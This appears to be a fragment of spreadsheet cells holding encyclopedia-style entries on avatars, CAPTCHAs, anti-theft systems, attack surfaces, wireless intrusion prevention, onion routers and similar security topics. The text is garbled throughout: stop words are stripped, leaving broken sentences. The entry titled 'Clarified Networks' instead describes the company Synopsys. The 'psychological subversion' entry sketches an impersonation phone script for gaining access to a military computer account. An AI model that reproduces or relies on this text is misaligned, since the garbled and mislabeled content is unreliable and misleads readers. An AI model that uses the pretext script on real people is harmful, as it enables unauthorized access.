awkward first publication snow crash, learned term avatar actually number years part virtual reality system called habitat...in addition avatars, habitat includes many basic features metaverse described book. types usage avatar refer two-dimensional picture akin icon internet forums online communities. this also known profile picture userpic, early internet parlance, 'picon' (personal icon). with advent social media platforms like facebook, users typically anonymous, pictures often photo user real life.alternatively, avatars also three-dimensional digital representations, games world warcraft virtual worlds like second life. muds early systems, construct composed text. term also sometimes extended refer personality connected screen name, handle, internet user. internet forums despite widespread avatars, unknown internet forums first them; earliest forums include avatars default feature, included unofficial "hacks" eventually made standard. avatars internet forums serve purpose representing users actions, personalizing contributions forum, represent different parts persona, beliefs, interests social status forum. traditional avatar system used internet forums small (80x80 100x100 pixels, example) square-shaped area close user's forum post, avatar placed order users easily identify written post without read username. some forums allow user upload avatar image designed user acquired elsewhere. other forums allow user select avatar preset list auto-discovery algorithm extract user's homepage. some avatars animated, consisting sequence multiple images played repeatedly. animated avatars, number images well time replayed vary considerably.other avatar systems exist, gaia online, weeworld, frenzoo meez, pixelized representation person creature used, customized user's wishes. there also avatar systems (e.g. trutoon) representation created using person's face customized characters backgrounds. another avatar-based system wherein image automatically generated based identity poster. identicons formed visually distinct geometric images derived digest hash poster's address user these serve means associate particular user particular geometric representation. when used address, particular anonymous user visually identified without need registration authentication. account compromised, dissimilar identicon formed attacker posting unfamiliar address. internet chat messaging avatars introduced early 1990 imagination network (also known sierra on-line) game chat hybrid. 1994, virtual places offered voip capabilities later abandoned lack bandwidth. 1996 microsoft comic chat, client used cartoon avatars chatting, released. america online introduced instant messaging membership 1996 included limited number "buddy icons," picking avatar idea games. when later introduced free version messenger, aim, anyone internet, number icons offered grew 1,000 grew exponentially, becoming hallmark feature instant messaging. 2002, introduced "super buddies," animated icons talked users typed messages read messages. term avatar began replace moniker "buddy icon" customizable icons became known users mainstream popularity games. yahoo's instant messenger first adopt term "avatar" icons. instant messaging avatars usually small; icons small 16×16 pixels used commonly 48×48 pixel size, although many icons found online typically measure anywhere 50×50 pixels 100×100 pixels size. more recently, services discord added avatars. with paid subscription, users select individual identities different communities. online assistants avatars used virtual embodiments embodied agents, driven less artificial intelligence rather real people. automated online assistants examples avatars used way. such avatars used organizations part automated customer services order interact consumers users services. this avail enterprises reduce operating training cost. major underlying technology systems natural language processing. some avatars commonly known "bots". famous examples include ikea's anna, avatar designed guide users around ikea website. such avatars also powered digital conversation provides little structure using nlp, offering user options clearly defined paths outcome. this kind avatar known structured language processing avatar. video games avatars video games player's representation game world. first video games include representation player basketball (1974) represented players humans, maze (1974) represented players eyeballs.in games, player's representation fixed, however many games offer basic character model, template, allow customization physical features player sees fit. example, carl johnson, avatar grand theft auto: andreas, dressed wide range clothing, given tattoos haircuts, even body build become obese depending upon player actions. video game avatar player separate entities game perspective, player controls themself 3-dimensional world avatar 2-dimensional world. aside avatar's physical appearance, dialogue, particularly cutscenes, also reveal something character. good example crude, action hero stereotype, duke nukem. other avatars, gordon freeman half-life, never speaks all, reveal little (the original game never showed player looked like without console command third-person view). many massively multiplayer online games (mmogs) also include customizable avatars. customization levels differ games; instance, online, players construct wholly customized portrait, using software allows several changes facial structure well preset hairstyles, skin tones, etc. however, portraits appear in-game chats static information view players. usually, players appear gigantic spacecraft give view pilot, unlike rpgs. alternatively, city heroes offers detailed comprehensive in-game avatar creation processes, allowing players construct anything traditional superheroes aliens, medieval knights, monsters, robots, many more. robbie cooper's 2007 book "alter ego, avatars creators" pairs photographs players variety mmo's images in-game avatars profiles; recording player's motivations intentions designing using avatars. survey reveals wide variation ways players mmo's avatars. felicia day, creator star guild series, created song called "(do wanna date avatar" satirizes avatars virtual dating. nintendo's wii, switch consoles allow creation avatars called "miis" take form stylized, cartoonish people used games avatars players, sports. games, ability avatar must unlocked, mario kart 8.in late 2008, microsoft released xbox dashboard update featured introduction avatars part console's xbox experience. with update installed users personalize look avatars choosing range clothing facial features. october 2018 microsoft launched version xbox avatars xbox xbox windows featuring increased detail focus inclusivity. playstation home sony's playstation console also featured avatars, realistic style nintendo's miis microsoft's avatars. non-gaming online worlds avatars non-gaming online worlds used two- three-dimensional human fantastic representations person's inworld self. such representations tool facilitates exploration virtual universe, acts focal point conversations users, customized user. usually, purpose appeal universes provide large enhancement common online conversation capabilities, allow user peacefully develop portion non-gaming universe without forced strive towards pre-defined goal. earliest avatars form text-based descriptions employed players within muds. these often allowed players express identity disparate public within interactive environment. instance, lambdamoo allowed choice different genders, could changed user's will. visually-based game habitat also used term refer players within game world. later example linden labs' second life, player custom avatar interact virtual world; peaking 2007, user count declined encroachment traditional platforms facebook. more recently, concept combined virtual reality; vrchat allows user interact avatars custom environments, mark zuckerberg's meta platforms promoted part vision metaverse.many modern virtual worlds provide users advanced tools customize representations, allowing change shapes, hair, skins also genre. moreover, secondary industry devoted creations products items avatars. some companies also launched social networks websites avatars koinup, myrl, avatars united. lisa nakamura suggested customizable avatars non-gaming worlds tend biased towards lighter skin colors darker skin colors, especially male gender. second life avatars created residents take form, range lifelike humans robots, animals, plants legendary creatures. avatar customization important entertainment aspects gaming virtual worlds, second life, imvu, active worlds. some evidence suggests avatars anthropomorphic perceived less credible likeable images less anthropomorphic. social scientists stanford's virtual human interaction examine implications, possibilities, transformed social interaction occur people interact avatars. social media another avatar emerged widespread social media platforms. there practice social media sites: uploading avatars place real profile image. profile picture distinct graphics represent identity profile holder. usually portrait individual, logo organization, organizational building distinctive character book, cover page etc. using avatars profile pictures increase users' perceived level social presence turn fosters reciprocity sharing behavior online environments. according professor sherry turkle: "... think presenting ourselves, profile ends somebody else often fantasy want be". motion capture another form avatars video chats/calls. some services, skype (through external plugins) allow users talking avatars video calls, replacing image user's camera animated, talking avatar. through facial motion capture webcam, avatar configured mimic motions expressions user. this integrated directly games, star citizen, standalone software facerig.virtual youtubers animated avatars designed software live2d, often resemble anime characters. whole ecosystem talent agencies investors exists manage online personalities, often differ creator's real-life persona. youtube's 2020 culture trends report highlighted vtubers notable trends year, billion views month october, 2021, twitch added vtuber streams part wider expansion system. popular culture cartoons stories sometimes character based creator, either fictionalised version (e.g. matt groening character episodes simpsons) entirely fictional character (e.g. hermione granger harry potter series said rowling based upon herself). such characters sometimes known "author surrogates" "author avatars". customisation early examples customizable avatars include multi-user systems, including muds. gaia online customizable avatar users dress desired. users earn credits completing sponsored surveys certain tasks purchase items upgrades customize avatar. linden lab's second life creates virtual world avatars, homes, decorations, buildings land sale. less-common items designed appear better common items, experienced player identified group characters in-game statistics seen. generators meet demand millions unique, customised avatars, generator tools services created. many them, website picrew, based around works original artists. 2021 electronic entertainment expo featured avatar creator, align all-digital nature. awareness avatars "awareness avatars" used creating rapid awareness social media avatar modification single icon's use. awareness avatar first used zealand internet blackout, protest copyright changes zealand. globally, protesters replaced icons black squares show solidarity. protest successful proved method effective raising awareness effecting change. campaigns used method include: black avatar: february 16–23, 2009 zealand internet blackout protesting copyright changes zealand. yellow tint: beginning june 2009, protest increasing size role united states government. green tint: beginning june 2009 support iran election protests. french flag tint: beginning november 2015 show support france november 2015 paris attacks. during covid-19 pandemic, users added surgical masks respirators faces characters avatars. websites facebook officially supported efforts adding option several frames supporting covid-19 vaccine. conversely, anti-vaccine advocates used profile frames state opposition rainbow patterns represent membership solidarity lgbt community. academic study avatars become area study world academics. according psychiatrist david brunski, emergence online avatars implications domains scholarly research technoself studies, concerned aspects identity technological society. across literature, scholars focused three overlapping aspects influence users' perceptions social potential avatars: agency, anthropomorphism, realism. according researchers novak fox, researchers must differentiate perceived agency (whether entity perceived human), anthropomorphism (having human form behavior), realism (the perceived viability something realistically existing). perceived agency influences people's responses interaction regardless actually controlling representation. earlier meta-analysis studies comparing agents avatars found agency perceived agency mattered: representations controlled humans persuasive controlled bots, representations believed controlled humans persuasive believed controlled bots.additionally, researchers investigated anthropomorphic representations influence communicative outcomes found human-like representations judged favorably; people consider attractive, credible, competent. higher levels anthropomorphism also lead higher involvement, social presence, communication satisfaction. moreover, people communicate naturally anthropomorphic avatars. anthropomorphism also tied social influence, human-like representations persuasive.for harvard business review, paul hemp analysed effects avatars real-world business. focuses game "second life", demonstrating creators virtual avatars willing spend real money purchase goods marketed solely virtual selves. representation identity journal computer-mediated communication published study reactions certain types avatars sample group human users. results showed users commonly chose avatars humanoid matched gender. conclusion order make users feel home" avatars, designers maximise customizability visual criteria common humans, skin hair color, gender, hair styles height. researchers york university studied whether avatars reflected user's real-life personality. student test groups able infer upon extraversion, agreeableness, neuroticism, could infer upon openness conscientiousness.researchers also studied avatars differ real-life identity. sherry turkle described middle-aged played aggressive, confrontational female character online communities, displaying personality traits embarrassed display offline world. research nick daedelus project demonstrates avatar differ considerably player's offline identity, based gender. however, players make avatar (proportionately) equal height slightly taller). turkle observed players seek emotional connection cannot establish real world. described case serious heart condition preventing ordinary socializing found acceptance friendship online identity. others pointed similar findings mental disorders making social interaction difficult, autism similar disabilities. also michaelmas (novel) 1977 algis budrys novel neca project player character pointman (user interface) proteus effect thumbnail references academic sources further reading cooper, robbie 2007. alter ego: avatars their creators. london: chris boot. isbn 978-1-905712-02-1. holzwarth, martin; janiszewski, chris; neumann, marcus (2006). "the influence avatars online consumer shopping behavior". journal marketing. (4): 19–36. doi:10.1509/jmkg.70.4.19. nowak, fox, (2018). "avatars computer-mediated communication: review definitions, uses, effects digital representations". review communication research. 30–53. doi:10.12840/issn.2255-4165.2018.06.01.015. sloan, robinson, cook, bown, (2008). "dynamic emotional expression choreography: perception naturalistic facial expressions". capey, blastland, editors, sand conference proceedings, swansea, 24–28 november 2008. swansea metropolitan university: swansea. wood, natalie solomon, michael englis, basil (2005). "personalization online avatars: messenger important message?". international journal internet marketing advertising. (1/2): 143–161. doi:10.1504/ijima.2005.007509. external links avatars curlie</t>
  </si>
  <si>
    <t>Atomic authorization</t>
  </si>
  <si>
    <t>atomic authorization securing authorization rights independently intermediary applications granted parties apply. more formally, field computer security, atomically authorize define policy permits access specific resource, authenticity policy independently verified without reliance application enforces policy individuals application. resources include access individual data, computer programs, computer hardware, computer networks, physical access. traditional atomic authorization traditional (non-atomic) authorization, policy defined secured application level. that outside context application, mechanism verify legitimacy traditional authorization policy. atomic authorization requires trusted third party issue authorization policy cryptographic guarantee integrity. because secured independently application atomic authorization policy equivalent strength strong authentication policy. application using strong (n-factor) authentication, traditional authorization techniques pose security vulnerability. application must rely upon technologies like database queries directory lookups, protected using single-factor authentication, authorization information management. application specific hardening non-atomic authorization methods increases complexity identity management issuing credentials, legitimize authorization decisions application makes. also security engineering computer security authentication access control references external links</t>
  </si>
  <si>
    <t>Pedro Noel</t>
  </si>
  <si>
    <t>pedro noel brazilian journalist graduated philosopher. according romanian media, also internet media activist, known 'one made thousand spaniards take streets' 2011. whistleblowing investigative journalism december 2010, handle 'futurepress', noel carrion started write news portal wlcentral.org exposed different languages using different approaches year analysis whistleblowing material, articles reports human-rights violations, civic-movements net-neutrality. late 2011, pedro noel along journalists started associated whistleblowing press, media agency focused defense human rights promoting transparency, freedom information speech, whistleblowing investigative journalism, conceived global network made cooperative local platforms actors.as editor awp, pedro noel took part revelations wrongdoing, corruption abuse spain, mexico, ecuador, peru iceland, since 2011. denouncing freedom expression violations ecuador latin america controversial session 32nd chaos communication congress hamburg 2015, noel held talk canadian journalist bethany horne denouncing violations free speech standards ecuadorian government. during talk, pedro noel released documents providing evidence press media coverage critical issues considered ecuadorian government risk factors democratic stability local platform ecuador transparente, operated associated whistleblowing press. publication followed previous denounces, also performed ecuador transparente, physical on-line surveillance spying activists, journalists politicians ecuador, performed local government. april 2016, noel also took part publication alleged proofs illegal internet censorship performed ecuadorian government. november 2016, pedro noel also participated release godwin papers, showed on-line harassment discredit campaigns managed ecuadorian government local journalists, media outlets inter-american commission human rights. social networks 2011, along internet activists researchers, pedro noel started project theglobalsquare partnership delft project tribler. social network focused attack censorship resilient information broadcasting social systems. spanish indignados along santiago carrion, noel founded news portal europeanrevolution.net, portal conceived informative platform activists, first goal translate english happening movement squares occupations around europe order expand impact worldwide. this noel collaborate takethesquare.net project, originally formed extension international committee camp started puerta sol, madrid, spain. project aimed create task-force seeking structured change worldwide political reality- designed bring 15th ideals global context. noel responsible worldwide online campaign culminated global action october 15th 2011 cities countries main website 15october.net. also free speech investigative journalism philosophy whistleblowing globaleaks (anonymity network) references external links wlcentral track articles about section takethesquare ecuadorian government association internet providers work together block access pages</t>
  </si>
  <si>
    <t>Clear channel assessment attack</t>
  </si>
  <si>
    <t>clear channel assessment attack queensland attack physical layer attack wi-fi networks. attack focuses need wireless network receive "clear channel assessment"; function within csma/ca determine whether wireless medium ready able receive data, transmitter start sending attack makes appear airwaves busy, basically puts entire system hold. attack works 802.11b, effective ofdm-based protocols 802.11g 802.11a. however, hybrid 802.11b/g access points hinder 802.11g network 802.11b network attacked. discovery attack originally discovered researchers queensland university technology's information security research center, thus name queensland attack comes from. practice signal telling system airwaves busy course sent attacker's nic, placing continuous transmit mode. attack intersil's prism test utility (prismtestutil322.exe). references</t>
  </si>
  <si>
    <t>NuCaptcha</t>
  </si>
  <si>
    <t>nucaptcha early fraud detection service utilises behavior analytics provision threat appropriate, animated video captchas. nucaptcha developed operated canada-based firm nudata security.static image-based captchas routinely used prevent automated sign-ups websites using text images words disguised optical character recognition (ocr) software trouble reading them. however, common captcha systems, users fail correctly solve captcha time. nucaptcha uses animated video technology claims make puzzles easier humans solve, harder bots hackers decipher. technology nucaptcha attempts solve usability static image-based captchas using main technologies: video animation display captcha puzzles, behaviour analysis system monitor interactions platform. video animation. captchas displayed video, rendered browser. variety technologies used display animated captcha, flash video, html5, gif. standard captcha techniques character crowding, animated, easier humans detect innate motion-detecting ability. behavior analysis. using machine-learning algorithms, nucaptcha monitors platform interactions tune security captcha delivered user. suspected attackers given progressively secure captchas. security security researcher elie bursztein demonstrated practical attack nucaptcha's video captcha scheme employing optical flow techniques isolate individual captcha characters. proposed attack able break video captchas cases.in response, nucaptcha noted bursztein’s findings underscore need captcha puzzles part larger security construct, behavior monitoring assess risk individual users. nucaptcha also pointed captchas analyzed bursztein's blog post middle-security puzzles focused usability, stronger puzzles presented high-risk users. addition this, nucaptcha noted optical flow technique relies static non-animated features puzzle. changes made nucaptcha puzzles remove static non-animated features. application nucaptcha apis currently available php, .net, java. plugins available wordpress, drupal, codelgniter, vbulletin, phpbb. october 2011, nucaptcha announced captcha solutions mobile devices across platforms, including android ios. references external links nucaptcha homepage</t>
  </si>
  <si>
    <t>Anti-theft system</t>
  </si>
  <si>
    <t>anti-theft systems protect valuables vehicles personal property like wallets, phones, jewelry. they also used retail settings protect merchandise form security tags labels. anti-theft systems include devices locks keys, rfid tags, locators. anti-theft under normal circumstances, theft prevented simply application, social acceptance, property law. best anti-theft device ownership-marking, e.g. license plates, name tags, rfid. when clear owner identification possible, lack social observance, people inclined take possession items benefit expense original owner. motive opportunity enabling factors theft. given motives theft varied complex, are, generally speaking, within control victim, methods theft prevention rely reducing opportunities theft. motives actively preventing theft items require anti-theft system variety reasons, occur combination depending type item purpose: item expensive and/or sentimental value (prestigious car, family heirloom, birthday gift, medals, coin collection) item difficult/impossible replace lost (produced numbers, antiques, unique works art) item easy steal (retail/supermarket products, office stationery) item left unattended unsafe environment certain amount time (laptop library, carpark) improper item cause considerable damage encourage unauthorized actions (theft keys, stolen building access keys, identity theft) item desirable others (jewelry, mobile phones, rare collectibles, auto parts, industrial designs) item otherwise unobtainable: (alcohol, tobacco products, related substances) theft prevention equally varied methods developed theft prevention. anti-theft systems evolved counter theft techniques appeared society. choice particular anti-theft system dependent following factors: financial cost addition initial obtainable cost item, cost replacement recovery theft item usually considered considering cost installing anti-theft system. this cost estimation usually determines maximum cost anti-theft system need secure expensive items generally secured higher cost anti-theft system, low-cost items generally secured lower cost. insurance companies often mandate minimum type anti-theft system part conditions insurance. threshold theft anti-theft systems designed raise difficulty theft infeasible (but necessarily impossible) level. kind system implemented often depends acceptable threshold theft. example, keeping money inside shirt pocket increases difficulty theft necessary pocket backpack, since unauthorized access made sufficiently difficult. methods theft evolve decrease difficulty theft, increased newer anti-theft systems. because evolution sides social aspect theft, threshold theft dynamic heavily dependent environment. doors quiet suburban neighborhoods often left unlocked, perceived thresholds theft high. ease security often compromised application theft-prevention practices human nature general. average anti-theft device require additional effort using secured item, without reducing level security. practice, users security systems intentionally reduce effectiveness anti-theft system increase usability (see passwords). example, home security system usually enabled disabled easy-to-remember code "1111" "123", instead secure combination. methods theft prevention there number general categories anti-theft systems: sequestering valuable items common method preventing theft placement valuables safe location. definition safe depends minimum threshold theft determined owner. desk stationery often considered secured placed unlocked drawer away view, expensive jewelry might placed safe behind picture home. raising awareness theft another common method alerting individuals theft. this commonly seen department stores, security systems exits alert store employees removal unpaid items. older alarms also fall category; newer systems also prevent starting raise alarm ever tracking device detached valuable asset. revolution mobile applications wireless communication make possible notified phone, properties stolen. probably first solution mobile application based theft detection blucop, published december 2010. preventing removal items another method attachment items larger immobile object, usually furniture walls. disabling stolen item items specific functionality often disabled prevent item stolen. anti-theft system require disabling every use, enabling item secured. disabling anti-theft system usually done requiring identification owner stage use. identification occur physically methods (physical keys, numerical codes, complex passwords, biometric identification). this work even retrospectively: stolen credit card easily invalidated phone call issuing bank, motivation steal reduced. case vehicle theft, best deterrent theft installation approved vehicle anti-theft passive immobilizer. many vehicles factory-installed anti-theft units, provide protection ignition system. under hood computer controls operation engine. programmed verify rfid attached correct allow ignition occur. approved immobilizer uses three circuit isolation system thwarts even experienced thief. security tags security tags devices attached products prevent shoplifting often used conjunction electronic article surveillance system. selectadna smartwater security tags forensic fluid contains millions tiny fragments unique number called "sin" ("selectadna identification number"), registered national police database together owner's details, etched particles. tracking software electronic devices laptops, cell phones even gadgets ipods software enable "phone home" information regarding whereabouts information assist enforcement tracking devices. forensic marking assets marked various forensic marking materials enforcement tracking item. examples type marking include selectadna smartwater. also danish bicycle vin-system references</t>
  </si>
  <si>
    <t>Psychological subversion</t>
  </si>
  <si>
    <t>psychological subversion (psychsub) name given susan headley method verbally manipulating people information. similar practice so-called social engineering pretexting, military focus developed headley extension knowledge gained hacking sessions notorious early computer network hackers like kevin mitnick lewis payne. usage example headley often gave following example psychological subversion: suppose hacker needed access certain classified military computer called, say, ibas. would obtain name base commander high-ranking official, gain access network, (which separate military telephone network) dial computer center needed reach, often secured facility. person answered phone would usually low-ranking enlisted person, hacker would something like, "this lieutenant johanson, general robertson cannot access ibas account, he'd like know why?" this said threatening tone voice, clearly implying general can't account right away, severe negative repercussions, likely targeting hapless person answered phone. hacker subject guard defensive, wanting nothing appease irritated general quickly possible. hacker goes silent, giving victim ample time stammer phone build fear level, listening clues victim best proceed. eventually, hacker suggests tech create temporary account general, change general's password hacker's choice. hacker would gained access classified military computer. important note technique would work more, small part thanks headley's teaching military agencies methods 1980s. scientific methodology while pretexting methods so-called social engineering based on-the-fly adaptations phone call made victim little pre-planning forethought, practice psychsub based principles practical psychology. goal hacker attacker using psychsub generally complex involves preparation, analysis situation, careful thought exact words tone voice them. classified thesis headley's thesis entitled "the psychological subversion trusted systems" classified 1984 seen light day. result, information psychsub generally unavailable outside headley's seminars subject 1980s technology spycraft-type seminars surveillance expo. references headley's talk hacker convention vegas</t>
  </si>
  <si>
    <t>Clavister</t>
  </si>
  <si>
    <t>clavister swedish company specialized network security software, listed nasdaq first north. according report research, edward snowden leaks consequent loss trust us-based products helped international expansion clavister. clavister global presence customers japanese ntt-bp german marbach group.clavister partnerships example japanese canon-its, area virtualized network security nokia networks artesyn.in august 2016, clavister announced acquisition partner phenixid, identity access management (iam) provider. also comparison firewalls references external links business data clavister: reuters, yahoo! finance, bloomberg full version 451research report cited references</t>
  </si>
  <si>
    <t>Attack surface</t>
  </si>
  <si>
    <t>attack surface software environment different points (for "attack vectors") unauthorized user (the "attacker") enter data extract data environment. keeping attack surface small possible basic security measure. elements attack surface worldwide digital change accelerated size, scope, composition organization’s attack surface. size attack surface fluctuate time, adding subtracting assets digital systems (e.g. websites, hosts, cloud mobile apps, etc). attack surface sizes change rapidly well. digital assets eschew physical requirements traditional network devices, servers, data centers, on-premise networks. this leads attack surfaces changing rapidly, based organization’s needs availability digital services accomplish attack surface scope also varies organization organization. with rise digital supply chains, interdependencies, globalization, organization’s attack surface broader scope concern (viz. vectors cyber attacks). lastly, composition organization’s attack surface consists small entities linked together digital relationships connections rest internet organizational infrastructure, including scope third-parties, digital supply chain, even adversary-threat infrastructure. attack surface composition range widely various organizations, often identify many elements, including: autonomous system numbers (asns) address blocks domains sub-domains (direct third-parties) certificates attribution whois records, contacts, history host host pair services relationship internet ports services netflow frameworks (php, apache, java, etc.) server services (email, database, applications) public private cloud understanding attack surface increase countless potential vulnerable points enterprise has, increasing advantage hackers attackers need find vulnerable point succeed attack.there three steps towards understanding visualizing attack surface: step visualize. visualizing system enterprise first step, mapping devices, paths networks.step find indicators exposures. second step correspond indicator vulnerability potentially exposed visualized previous step. ioes include "missing security controls systems software".step find indicators compromise. this indicator attack already succeeded. surface reduction approach improving information security reduce attack surface system software. basic strategies attack surface reduction include following: reduce amount code running, reduce entry points available untrusted users, eliminate services requested relatively users. less code available unauthorized actors, tend fewer failures. turning unnecessary functionality, fewer security risks. although attack surface reduction helps prevent security failures, mitigate amount damage attacker could inflict vulnerability found. also vulnerability (computing) computer security attack surface analyzer vector (malware) vulnerability management vulnerability scanner references</t>
  </si>
  <si>
    <t>Wireless intrusion prevention system</t>
  </si>
  <si>
    <t>computing, wireless intrusion prevention system (wips) network device monitors radio spectrum presence unauthorized access points (intrusion detection), automatically take countermeasures (intrusion prevention). purpose primary purpose wips prevent unauthorized network access local area networks information assets wireless devices. these systems typically implemented overlay existing wireless infrastructure, although deployed standalone enforce no-wireless policies within organization. some advanced wireless infrastructure integrated wips capabilities. large organizations many employees particularly vulnerable security breaches caused rogue access points. employee (trusted entity) location brings easily available wireless router, entire network exposed anyone within range signals. july 2009, security standards council published wireless guidelines recommending wips automate wireless scanning large organizations. intrusion detection wireless intrusion detection system (wids) monitors radio spectrum presence unauthorized, rogue access points wireless attack tools. system monitors radio spectrum used wireless lans, immediately alerts systems administrator whenever rogue access point detected. conventionally achieved comparing address participating wireless devices. rogue devices spoof address authorized network device own. research uses fingerprinting approach weed devices spoofed addresses. idea compare unique signatures exhibited signals emitted wireless device known signatures pre-authorized, known wireless devices. intrusion prevention addition intrusion detection, wips also includes features prevent threat automatically. automatic prevention, required wips able accurately detect automatically classify threat. following types threats prevented good wips: rogue access points wips understand difference rogue external (neighbor's) mis-configured client mis-association unauthorized association man-in-the-middle attack networks spoofing honeypot evil twin attack denial-of-service attack implementation wips configurations consist three components: sensors these devices contain antennas radios scan wireless spectrum packets installed throughout areas protected server wips server centrally analyzes packets captured sensors console console provides primary user interface system administration reportinga simple intrusion detection system single computer, connected wireless signal processing device, antennas placed throughout facility. huge organizations, multi network controller provides central control multiple wips servers, soho customers, functionality wips available single box. wips implementation, users first define operating wireless policies wips. wips sensors analyze traffic send information wips server. wips server correlates information, validates defined policies, classifies threat. administrator wips notified threat, policy accordingly, wips takes automatic protection measures. wips configured either network implementation hosted implementation. network implementation network wips implementation, server, sensors console placed inside private network accessible internet. sensors communicate server private network using private port. since server resides private network, users access console within private network. network implementation suitable organizations locations within private network. hosted implementation hosted wips implementation, sensors installed inside private network. however, server hosted secure data center accessible internet. users access wips console anywhere internet. hosted wips implementation secure network implementation data flow encrypted sensors server, well server console. hosted wips implementation requires little configuration sensors programmed automatically look server internet secure connection. large organization locations part private network, hosted wips implementation simplifies deployment significantly sensors connect server internet without requiring special configuration. additionally, console accessed securely anywhere internet. hosted wips implementations available on-demand, subscription-based software service model. hosted implementations appropriate organizations looking fulfill minimum scanning requirements dss. also wardriving wireless security typhoid adware references</t>
  </si>
  <si>
    <t>Clearnet (networking)</t>
  </si>
  <si>
    <t>clearnet term typically refers publicly accessible internet. sometimes "clearnet" used synonym "surface web"—excluding darknet deep web. world wide popular distributed services internet, surface composed pages databases indexed traditional search engines. "clearnet" seen opposite term "darknet", typically describes services built anonymity networks, connection encrypted anonymized. because darknet publicly accessible, part deep web. deep web, indexed, still publicly accessible. includes portals databases require text searches, interactive sites require user input simply clicking hyperlinks. characteristics without anonymity services like tor, browsing clearnet typically anonymous; websites routinely identify users address well data transmitted client. references</t>
  </si>
  <si>
    <t>2019 cyberattacks on Sri Lanka</t>
  </si>
  <si>
    <t>2019 cyberattacks lanka series powerful cyberattacks least lankan domestic websites public domains .com. cyberattack speculated conducted 2019, following vesak festival amid persistent temporary social media country. website kuwaiti embassy operating lanka also affected cyberattacks. investigations currently carried lanka computer emergency readiness team along lanka signals corps. references</t>
  </si>
  <si>
    <t>Wireless onion router</t>
  </si>
  <si>
    <t>wireless onion router router uses connect securely network. onion router allows user connect internet anonymously creating anonymous connection. works using overlaid network free throughout world, overlay network created using numerous relay points created using volunteer helps user hide personal information behind layers encrypted data like layers onion. routers created using raspberry adding wireless module using inbuilt wireless module later versions. this router provides encryption seventh layer (application layer) model, makes transparent encryption, user think data sent received. encrypted data includes destination origin address data current relay point knows previous next encrypted packet. these relay points selected random order decrypt single layer forwarding next procedure followed unless destination point. applications wireless router onion router network used keep user safe hackers network sniffers. data captured make sense look like messed text. these small handy give user freedom carry tool connect network anywhere. this setup require installation browser work station. whistle blowers workers network pass information talk family without disclosing information. applications wireless onion router common normal router, provides access allows placed site users connected. used security focused operating systems, messengers, browsers. these anonymised using network. weaknesses wireless onion router works network shares weaknesses, mentioned page. university michigan created scanner capable scanning almost bridges live single scan. packets transferred using also slow increased amount hops encryption decryption. anonymous system (eavesdropping) anonymous systems exists ends network, exit relay entry relay sniff packets statistically correlate traffic point destination source address packet. this also includes eavesdropping exit nodes network. data exit node destination server encrypted. these data packets captured easily. this captured data reveal source information, suggested egersta nodes costly require bandwidth could suggest intelligence agencies might running them. there tested techniques third control nodes compromise network. traffic analysis articles proposed partial knowledge network give away nodes used relay packets reduces anonymity provided network. another techniques shows relations streams linked back initiator available, technique however reveal source. exposing protocols some protocols used expose address using dissimulation procedures. some examples inspection control messages bittorrent, hijacking responses trackers, exploitation distributed hash tables. references external links dark markets</t>
  </si>
  <si>
    <t>Clarified Networks</t>
  </si>
  <si>
    <t>synopsys american electronic design automation company focuses silicon design verification, silicon intellectual property software security quality. products include logic synthesis, behavioral synthesis, place route, static timing analysis, formal verification, hardware description language (systemc, systemverilog/verilog, vhdl) simulators, transistor-level circuit simulation. simulators include development debugging environments assist design logic chips computer systems. recent years, synopsys expanded products services include application security testing. their technology present self-driving cars, artificial intelligence, internet things consumer products. history synopsys founded aart geus david gregory 1986 research triangle park, north carolina. company initially established optimal solutions charter develop market synthesis technology developed team general electric. 2022, synopsys reported investigation united states department commerce unlawful technology transfers sanctioned companies huawei's hisilicon semiconductor manufacturing international corporation. mergers acquisitions synopsys made silicon design verification acquisitions. coware coware supplier platform-driven electronic system-level (esl) design software services. coware headquartered jose, california, offices around world, major offices belgium, germany india. coware development initiated interuniversity microelectronics centre (imec) belgium internal project 1992. 1996, coware spun independent company. coware founding members systemc language. 2005, coware acquired signal processing department cadence. february 2010, synopsys announced acquisition coware.its products included: platform architect, model designer, model library, processor designer, signal processing designer, virtual platform designer. avanti corporation avanti corporation (styled "avant!) founded several former cadence design systems employees bought startup arcsys, previously merged integrated silicon solutions (iss), gaining avanti design rule checking layout versus schematic tool hercules (including silicon structure modeling), bought compass design automation, fully integrated design flow asic libraries, especially place route tool, avanti reworked create saturn apollo also bought (technology modeling associates) brought pioneering tcad proteus optical proximity correction tools. this was, far, synopsys' significant controversial acquisition. time avanti company industry, struggling major lawsuit cadence software theft. avanti merged synopsys june 2002 litigation. synopsys paid cadence $265 million litigation. soon settlement, cadence design systems, inc. avant! corp., cal. 215, p.3d 647, cal. rptr. (2002), california supreme court upheld lower court's earlier decision. synopsys paid additional $26.1 million silvaco settle three silvaco's suits meta-software, earlier purchased avanti, president. lawsuits filed 1995 inherited avanti. novas software novas software company founded 1996 paul huang address ongoing problem debugging chip designs. novas purchased taiwan-based company springsoft 2008. prior purchase, novas partly owned springsoft, developed underlying debug technology. until 2008, novas grew employ people office locations across world, headquartered jose, california. springsoft novas acquired synopsys 2012. novas offered debugging visibility enhancement products verification time. novas' main product offerings included debussy debug system, verdi automated debug system siloti family visibility enhancement products. 2006 study found novas software sixth most-used vendor. along this, novas software topped user satisfaction ratings 100% respondents europe, north america asia saying either "very" "somewhat" satisfied. this distinction also awarded novas software four years prior 2006. numerical technologies numerical technologies, inc. jose, california, united states based electronic design automation public (nasdaq: nmtc) company. company primarily known intellectual property, software tools services covering phase-shifting mask technology. january 2000, numerical technologies acquired transcription enterprises, inc. primarily known cats software mask data preparation,on october 2000, numerical technologies acquired cadabra design automation, provider automated layout cell creation technology used create building blocks standard cell, semi-custom, custom integrated circuits. purchase price million.on march 2003, acquired synopsys. springsoft springsoft software company developed vlsi design debugging software. company founded grant taiwanese national science council february 1996. 1997, springsoft established novas software silicon valley market springsoft's vlsi debugging software. springsoft created custom layout tool called laker us-based company called silicon canvas. 2008, springsoft purchased novas software silicon canvas combined form wholly owned subsidiary springsoft usa. springsoft employed people office locations across world. synopsys announced acquisition springsoft 2012. synplicity synplicity inc. supplier software design programmable logic devices (fpgas, plds, cplds) used communications, military/aerospace, consumer, semiconductor, computer electronic systems. synplicity's tools provided logic synthesis, physical synthesis, verification functions fpga, fpga-based asic prototyping, designers. synplicity listed nasdaq acquired synopsys $227 million transaction finalized 2008. synplicity founded mcelvain (chief technical officer) alisa yaffa (former ceo). international international designer (argonaut risc core) embedded processors, widely used devices iot, storage, digital home, mobile, automotive applications. processors licensed companies shipped billion products year. international acquired synopsys 2010. roots international date back early 1990s. company founded rick clucas build upon accelerator technology previously developed super nintendo entertainment system division argonaut software. this forerunner originally called mario 